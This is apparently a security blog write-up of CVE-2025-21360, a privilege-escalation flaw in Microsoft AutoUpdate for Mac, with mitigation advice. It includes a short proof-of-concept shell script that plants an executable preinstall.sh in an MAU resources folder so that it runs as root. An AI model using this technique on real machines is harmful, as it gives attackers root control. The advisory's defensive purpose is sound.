CVE-2025-21360 - Unpacking the Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability

In the realm of cybersecurity, even the most trusted software can be the source of critical vulnerabilities. One such issue —
CVE-2025-21360, discovered in Microsoft AutoUpdate (MAU) for macOS, exposes users to a dangerous *Elevation of Privilege* (EoP) flaw. This write-up dives deep into the details of this vulnerability, demonstrates how attackers can exploit it, and provides guidance for both security professionals and end-users.

What is Microsoft AutoUpdate (MAU)?

Microsoft AutoUpdate (MAU) is a utility bundled with Microsoft Office for Mac and other Microsoft apps. Its job is to keep apps updated, automatically downloading and installing new versions or patches. Given its requirements, MAU typically runs with elevated privileges, making it a prime target for security weaknesses.

Summary of CVE-2025-21360

CVE-2025-21360 is an *Elevation of Privilege* vulnerability. This means that a local attacker can abuse MAU to gain higher-level (root or system) privileges, allowing them to execute any code, modify protected files, or ultimately take full control of a Mac.

> Severity: High
> Vector: Local
> Affected Product: Microsoft AutoUpdate for Mac (see MSRC Advisory)
> Patch status: Fixed in MAU 4.64 (and later)

How Does the Vulnerability Work?

At the core of CVE-2025-21360 is the way MAU handles update installation. The vulnerability allows a local user (or a malicious process) to inject arbitrary code or replace files referenced by the updater, due to insecure file permissions or poor input validation.

Typical exploitation would follow these steps

1. Identify Writable Paths: The attacker locates files or directories MAU uses during updates with permissions that non-admin users can write to.

Inject Payload: The attacker places a specially crafted script or binary at that location.

3. Trigger AutoUpdate: When MAU runs (automatically or manually), it executes the attacker's code with privileged permissions.

This class of bugs is common when update tools don’t verify the integrity or trustworthiness of update files.

Proof-of-Concept (PoC) Exploit

Below is a simplified *proof-of-concept* (PoC) showing how an attacker might exploit the flaw, assuming there is an insecure writable directory /Library/Application Support/Microsoft/MAU2./Microsoft AutoUpdate.app/Contents/Resources/:

# PoC Exploit for CVE-2025-21360 (for educational purposes!)

# Step 1: Write a malicious script to the vulnerable path
echo '#!/bin/bash
osascript -e "display dialog \"Pwned as $(whoami)!\"" 
touch /tmp/root_accessed' > "/Library/Application Support/Microsoft/MAU2./Microsoft AutoUpdate.app/Contents/Resources/preinstall.sh"

# Step 2: Make the script executable
chmod +x "/Library/Application Support/Microsoft/MAU2./Microsoft AutoUpdate.app/Contents/Resources/preinstall.sh"

# Step 3: Wait for (or force) MAU to run its updater as root
# Next time MAU runs, your script executes as root!

Note: The actual file paths and process may differ. This is a generic demonstration for awareness.

Once in place, any malicious script will run as the system or root user.

- Common impacts: stealing keychain credentials, disabling system protections, installing persistent malware, or altering security settings.

Malicious actors commonly exploit such flaws as part of post-exploitation—after gaining initial access, EoP bugs let them become admin/root and burrow in deeper.

Inspect permissions in MAU app directories. Nothing there should be writable by regular users.

- Look for unexpected files/scripts in /Library/.../MAU* folders.

How to fix it

- Download and install the latest MAU.
- Do not allow ordinary users write access to /Library/Application Support/Microsoft/.

References

- Microsoft Security Update Guide: CVE-2025-21360
- Microsoft AutoUpdate for Mac - Official Site
- CISA KEV catalog
- Apple Platform Security - File System Permissions

Conclusion

CVE-2025-21360 shows how software updaters—trusted by millions—can become a dangerous attack vector if not properly secured. Every user running Microsoft Office on Mac should update their Microsoft AutoUpdate component immediately and review file permissions on sensitive app directories.

Stay safe: Keep your software updated, check permissions, and stay informed about new CVEs impacting the tools you depend on.


*Disclaimer: All information provided here is for educational and defensive security research only. Do not attempt to exploit systems without permission!*

Timeline

Published on: 01/14/2025 18:16:01 UTC
Last modified on: 02/21/2025 20:28:57 UTC